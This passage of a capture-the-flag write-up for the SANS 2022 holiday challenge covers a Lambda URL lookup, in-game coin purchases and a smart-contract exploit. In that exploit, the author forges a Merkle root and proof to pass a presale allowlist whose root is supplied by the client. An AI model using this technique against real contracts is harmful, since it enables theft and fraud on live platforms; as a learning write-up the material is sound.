&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Lambda functions can have public URLs from which they are directly accessible.
Use the AWS CLI to get the configuration containing the public URL of the Lambda function.
The aws lambda command to get the function URL config can be found here:
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/lambda/index.html
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We know from our previous command that the lambda function is named
&lt;code&gt;smogmachine_lambda&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@80c2de61d99b:~$&lt;/span&gt; aws lambda get-function-url-config --function-name smogmachine_lambda
&lt;span class="go"&gt;{&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;FunctionUrl&amp;quot;: &amp;quot;https://rxgnav37qmvqxtaksslw5vwwjm0suhwc.lambda-url.us-east-1.on.aws/&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;FunctionArn&amp;quot;: &amp;quot;arn:aws:lambda:us-east-1:602123424321:function:smogmachine_lambda&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;AuthType&amp;quot;: &amp;quot;AWS_IAM&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;Cors&amp;quot;: {&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;AllowCredentials&amp;quot;: false,&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;AllowHeaders&amp;quot;: [],&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;AllowMethods&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;GET&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;POST&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;        ],&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;AllowOrigins&amp;quot;: [&lt;/span&gt;
&lt;span class="go"&gt;            &amp;quot;*&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;        ],&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;ExposeHeaders&amp;quot;: [],&lt;/span&gt;
&lt;span class="go"&gt;        &amp;quot;MaxAge&amp;quot;: 0&lt;/span&gt;
&lt;span class="go"&gt;    },&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;CreationTime&amp;quot;: &amp;quot;2022-09-07T19:28:23.808713Z&amp;quot;,&lt;/span&gt;
&lt;span class="go"&gt;    &amp;quot;LastModifiedTime&amp;quot;: &amp;quot;2022-09-07T19:28:23.808713Z&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;Great, you did it all - thank you!
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This gives us our fourth ring, the Cloud Ring:&lt;/p&gt;
&lt;img alt="The Cloud Ring. It's a simple golden ring, like the one from Lord of the Rings, etched with clouds and wind lines." class="align-center" src="/images/sans-christmas-challenge-2022/cloud_ring.png" /&gt;
&lt;img alt="Sulfrod, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/sulfrod.png" /&gt;
&lt;p&gt;&lt;em&gt;Sulfrod says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Ha! Now I have the ring!&lt;/p&gt;
&lt;p&gt;This computer stuff sure is easy if you just make someone do it for you.&lt;/p&gt;
&lt;p&gt;Wait.. the computer gave &lt;strong&gt;you&lt;/strong&gt; the ring? Gah, whatever.&lt;/p&gt;
&lt;p&gt;This never happened, got it? Now beat it, nerd!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We go back our way only to find a distraught Grinchum:&lt;/p&gt;
&lt;img alt="Grinchum, now red in the face." class="align-center" src="/images/sans-christmas-challenge-2022/smeagolmad3.png" /&gt;
&lt;p&gt;&lt;em&gt;Grinchum says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;🥺 &lt;em&gt;Four Preciouses - lost!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😫 &lt;em&gt;Noooo... grinchum..grinchum&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;😐 &lt;strong&gt;..... naggy human doesn't only want coinses and hatses.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;...What...&lt;/strong&gt; 🤨 &lt;strong&gt;has it got...&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😠 &lt;strong&gt;in its silly, little, badges!?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😧 &lt;strong&gt;Stole them...&lt;/strong&gt; 😠 &lt;strong&gt;You STOLE them!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;😡 &lt;strong&gt;Raaaargh!! We will make sure naggy human never takes our last
Precious!&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-the-burning-ring-of-fire"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id28"&gt;Recover the Burning Ring of Fire&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="buy-a-hat"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id29"&gt;Buy a Hat&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Down and down we go, where our mine canary can no longer breathe, until we meet
Wombley Cube:&lt;/p&gt;
&lt;img alt="Wombley Cube is a green-skinned elf, with a white beard, a white T-Shirt, pink pants, black- and white-striped socks, and pink pointy elf shoes. He's wearing a purple Christmas hat." class="align-center" src="/images/sans-christmas-challenge-2022/wombleycube.png" /&gt;
&lt;p&gt;&lt;em&gt;Wombley Cube says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hey there! I'm Wombley Cube. It's so nice to see a friendly face.&lt;/p&gt;
&lt;p&gt;What's an elf doing all the way down here with all these sporcs, you ask?&lt;/p&gt;
&lt;p&gt;I'm selling snazzy, fancy-pants hats! You can buy them with Kringlecoin.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;The reason I set up shop here is to gather intel on that shady Luigi.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;I'm a member of the STINC: Santa's Team of Intelligent Naughty Catchers.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;He and his gang are up to no good, I'm sure of it. We've got a real Code
Brown here.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Purchase a hat so we look inconspicuous, and I'll clue you in on what we
think they're scheming.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Of course, have a look at my inventory!&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Oh, and if you haven't noticed, I've slipped hints for defeating these
Sporcs around the tunnels!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Keep your eyes open, and you'll find all five of them. Wait, maybe it's
six?&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;An undercover elf among the Sporcs! The hints he talks about are chests
lying around the tunnels, but most of them only contain KringleCoins. Luckily
for us, we can use those to buy a hat from Wombley.&lt;/p&gt;
&lt;p&gt;We click on his hat-vending machine, and settle on this fine gray cowboy hat:&lt;/p&gt;
&lt;img alt="Our chosen hat, a gray cowboy hat. The vending machine gives us instruction as to how to buy it: &amp;quot;To purchase this hat you must: Use a KTM to pre-approve a 10 KC transaction to the wallet address: hexadecimal value of the address. Return to this kiosk and use Hat ID: 398 to complete your purchase." class="align-center" src="/images/sans-christmas-challenge-2022/chosen_hat.png" /&gt;
&lt;p&gt;We go to a KTC (KringleCoin Teller Machine) and pre-approve our 10 KringleCoin
transaction:&lt;/p&gt;
&lt;img alt="The KTM interface where we're buying our hat. There are three fields. The first one is the destination wallet address, filled with the value given by the vending machine. The second is the amount of the transaction, which is 10 KC. The last one is my censored private key." class="align-center" src="/images/sans-christmas-challenge-2022/hat_pre_approval.png" /&gt;
&lt;p&gt;We now go back to the hat-vending machine to claim our hat:&lt;/p&gt;
&lt;img alt="The vending machine interface. There are two fields. The first one is filled with my wallet address, and the second one with the ID of the desired hat (in our case 398 for the gray cowboy hat). Below the two fields, we see &amp;quot;Transaction succeeded! Transaction ID: large hexadecimal value. Block 76303." class="align-center" src="/images/sans-christmas-challenge-2022/hat_approved_transaction.png" /&gt;
&lt;p&gt;I can now wear my cool hat everywhere:&lt;/p&gt;
&lt;img alt="My avatar wearing the gray cowboy hat." class="align-center" src="/images/sans-christmas-challenge-2022/useless_avatar_with_hat.png" /&gt;
&lt;/div&gt;
&lt;div class="section" id="blockchain-divination"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id30"&gt;Blockchain Divination&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="Wombley Cube, same image as before." class="align-center" src="/images/sans-christmas-challenge-2022/wombleycube.png" /&gt;
&lt;p&gt;&lt;em&gt;Wombley Cube says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Nice hat! I think Ed Skoudis would say the same. It looks great on you.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;So, here's what we've uncovered so far. Keep this confidential, ok?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Earlier, I overheard that disgruntled customer in the office saying he
wanted in on the &amp;quot;rug pull&amp;quot;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;If our suspicions are correct, that's why the sporcs want an invite to the
presale so badly.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Once the&lt;/em&gt; &amp;quot;&lt;a class="reference external" href="https://en.wikipedia.org/wiki/Bored_Ape"&gt;Bored Sporc Rowboat Society&lt;/a&gt;&amp;quot;
&lt;em&gt;NFTs officially go on sale, the sporcs will upsell them.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;After most of the NFTs are purchased by unwitting victims, the Sporcs are
going to take the money and abandon the project.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Mission #1 is to find a way to get on that presale list to confirm our
suspicions and thwart their dastardly scheme!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;We also think there's a Ring hidden there, so drop Mission #2 on them and
rescue that ring!&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Thank you for your business, dear customer!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Sporcs are running an NFT scam, schocking. Anyway, we're asked to find the
address of the KringleCoin smart contract on the blockchain.&lt;/p&gt;
&lt;p&gt;The Blockchain Explorer can be used to analyze the different blocks of the
blockchain. For example, we can look at block #76303, which is the block with
my transaction to buy a hat:&lt;/p&gt;
&lt;img alt="The Blockchain Explorer showing block #76303. We can see that it's a transaction block with a value of 10 and a comment &amp;quot;Purchased HatID #398!&amp;quot;" class="align-center" src="/images/sans-christmas-challenge-2022/blockchain_explorer_block_76303.png" /&gt;
&lt;p&gt;Let's look at the first block on the blockchain:&lt;/p&gt;
&lt;img alt="The Blockchain Explorer showing block #1. This says &amp;quot;This transaction creates a contract. KringleCoin&amp;quot;. The address of the contract is then given." class="align-center" src="/images/sans-christmas-challenge-2022/blockchain_explorer_block_1.png" /&gt;
&lt;p&gt;The address of the KringleCoin contract is &lt;code&gt;0xc27A2D3DE339Ce353c0eFBa32e948a88F1C86554&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="exploit-a-smart-contract"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id31"&gt;Exploit a Smart Contract&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Here's the big one, we must now find a way to get on the presale list by
exploiting a vulnerability in the Bored Sporc Rowboat Society smart contract.&lt;/p&gt;
&lt;p&gt;By taking a look at &lt;a class="reference external" href="https://boredsporcrowboatsociety.com/"&gt;the BSRC website&lt;/a&gt;,
we learn more about the pre-sale list:&lt;/p&gt;
&lt;blockquote&gt;
We are currently in &amp;quot;pre-sale&amp;quot; mode, which means that the only folks who
can buy are our best buds who made it on the list (well, actually, the
Merkle Tree).&lt;/blockquote&gt;
&lt;p&gt;So the pre-sale list is stored in the form of a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Merkle_tree"&gt;Merkle tree&lt;/a&gt;. Now I don't know squat about
smart contracts or Merkle tree. Luckily for us, Prof. Qwerty Petabyte is back
with a &lt;a class="reference external" href="https://www.youtube.com/watch?v=Qt_RWBq63S8"&gt;KringleCon talk on the subject&lt;/a&gt;.
There's also a &lt;a class="reference external" href="https://github.com/QPetabyte/Merkle_Trees"&gt;new repository&lt;/a&gt;
on their Github profile, which should help any Merkle tree shenanigans we'll
get into.&lt;/p&gt;
&lt;p&gt;I recommend listening to the talk and reading the repository's &lt;a class="reference external" href="https://github.com/QPetabyte/Merkle_Trees/blob/main/README.md"&gt;README&lt;/a&gt; as well as
the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Merkle_tree"&gt;Wikipedia article&lt;/a&gt; on
Merkle trees to fully understand how they work.&lt;/p&gt;
&lt;p&gt;Long story short, people on the BSRS pre-sale list are given proof values
that they can send to the web site along with their wallet address. The smart
contract will compute the intermediary values until it gets to the root value,
and then compare it to the root value it has stored...&lt;/p&gt;
&lt;p&gt;...or does it? In Prof. Petabyte's README, we can read:&lt;/p&gt;
&lt;blockquote&gt;
The only value the NFT producer needs to keep in their blockchain code is
the root value itself! Because keeping anything stored on the blockchain is
expensive, this is a huge benefit! Of course, the root mustn't be able to
be altered, which is why keeping it IN the smart contract on the blockchain
is what smart developers do.&lt;/blockquote&gt;
&lt;p&gt;Maybe the BSRS creators made a mistake and did not store the root on the
blockchain? If we use the Blockchain Explorer, we can see that block #2
contains the contract tied to the BSRS NFT:&lt;/p&gt;
&lt;img alt="The Blockchain Explorer showing block #2. This says &amp;quot;This transaction creates a contract. BSRS_nft&amp;quot;." class="align-center" src="/images/sans-christmas-challenge-2022/blockchain_explorer_block_2.png" /&gt;
&lt;p&gt;We can get the &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Solidity"&gt;Solidity&lt;/a&gt; code of
the BSRS NFT contract directly from the Blockchain Explorer. You can download
it &lt;a class="reference external" href="/docs/sans-christmas-challenge-2022/BSRS_nft.sol"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;By looking around, we find the &lt;code&gt;verify&lt;/code&gt; function:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;function verify(bytes32 leaf, bytes32 _root, bytes32[] memory proof) public view returns (bool) {
    bytes32 computedHash = leaf;
    for (uint i = 0; i &amp;lt; proof.length; i++) {
      bytes32 proofElement = proof[i];
      if (computedHash &amp;lt;= proofElement) {
        computedHash = keccak256(abi.encodePacked(computedHash, proofElement));
      } else {
        computedHash = keccak256(abi.encodePacked(proofElement, computedHash));
      }
    }
    return computedHash == _root;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It looks like the &lt;code&gt;verify&lt;/code&gt; function takes a &lt;code&gt;_root&lt;/code&gt; parameter. It
sure does seem that the root value is &lt;em&gt;not&lt;/em&gt; stored on the blockchain. This can
be confirmed by using the &lt;a class="reference external" href="https://boredsporcrowboatsociety.com/presale.html"&gt;pre-sale form&lt;/a&gt;.
This form loads a &lt;a class="reference external" href="https://boredsporcrowboatsociety.com/bsrs.js"&gt;JavaScript file&lt;/a&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;do_presale&lt;/span&gt;&lt;span class="p"&gt;(){&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="nx"&gt;guid&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="nx"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;You need to enter this site from the terminal at the North Pole, not directly. If are doing this directly, you risk not getting credit for completing the challenge.&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;resp&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;response&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ovr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;overlay&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nx"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;innerHTML&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;cb&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;validate&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;checked&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;false&amp;#39;&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;cb&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
            &lt;span class="nx"&gt;val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;true&amp;#39;&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;ovr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;style&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;display&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;block&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="nx"&gt;in_trans&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;address&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;wa&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;proof&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;document&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;getElementById&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;proof&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="hll"&gt;        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;root&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;0x52cfdfdcba8efebabd9ecc2c60e6f482ab30bdc6acf8f9bd0600de83701e15f1&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;xhr&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nx"&gt;XMLHttpRequest&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;

        &lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Post&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;cgi-bin/presale&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;setRequestHeader&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Content-Type&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;application/json&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;onreadystatechange&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(){&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;readyState&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
                &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;jsonResponse&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;response&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
                &lt;span class="nx"&gt;ovr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;style&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;display&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;none&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nx"&gt;in_trans&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
                &lt;span class="nx"&gt;resp&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;innerHTML&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;jsonResponse&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Response&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="p"&gt;};&lt;/span&gt;
        &lt;span class="nx"&gt;xhr&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;WalletID&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;address&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Root&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;root&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Proof&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;proof&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Validate&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;val&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;Session&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;guid&lt;/span&gt;&lt;span class="p"&gt;}));&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;They sure messed up. We can now build our own Merkle tree with our wallet
address, compute our proof and root values, and pretend we're on the pre-sale
list. This is where &lt;a class="reference external" href="https://github.com/QPetabyte/Merkle_Trees"&gt;Prof. Petabyte's repository&lt;/a&gt;
will come useful.&lt;/p&gt;
&lt;p&gt;We clone the repo, create a &lt;code&gt;venv&lt;/code&gt;, and install the requirements:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; git clone https://github.com/QPetabyte/Merkle_Trees
&lt;span class="gp"&gt;$&lt;/span&gt; python3 -m venv ~/venv/merkle
&lt;span class="gp"&gt;$&lt;/span&gt; &lt;span class="nb"&gt;source&lt;/span&gt; ~/venv/merkle/bin/activate
&lt;span class="gp"&gt;$&lt;/span&gt; pip3 install wheel
&lt;span class="gp"&gt;$&lt;/span&gt; pip3 install -r ./Merkle_Trees/requirements.txt
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, we can edit the file to put build our Merkle tree with our wallet address.
We just modify the &lt;code&gt;allowlist&lt;/code&gt; variable:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="n"&gt;allowlist&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;0x129c7E7e786120E3DCD29D4c2ad0d0001616fad2&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;0x0000000000000000000000000000000000000000&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now, let's run the script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; python3 merkle_tree.py
&lt;span class="go"&gt;Root: 0x5fb0f1ec0a42dc34152e3937c295c5e2ad1e105ce5bef576a33d47c3bbe3f42e&lt;/span&gt;
&lt;span class="go"&gt;Proof: [&amp;#39;0x5380c7b7ae81a58eb98d9c78de4a1fd7fd9535fc953ed2be602daaa41767312a&amp;#39;]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can now pretend to be on the pre-sale list. We use the pre-sale verification
form, and intercept it using Burp to modify the value of the root parameter:&lt;/p&gt;
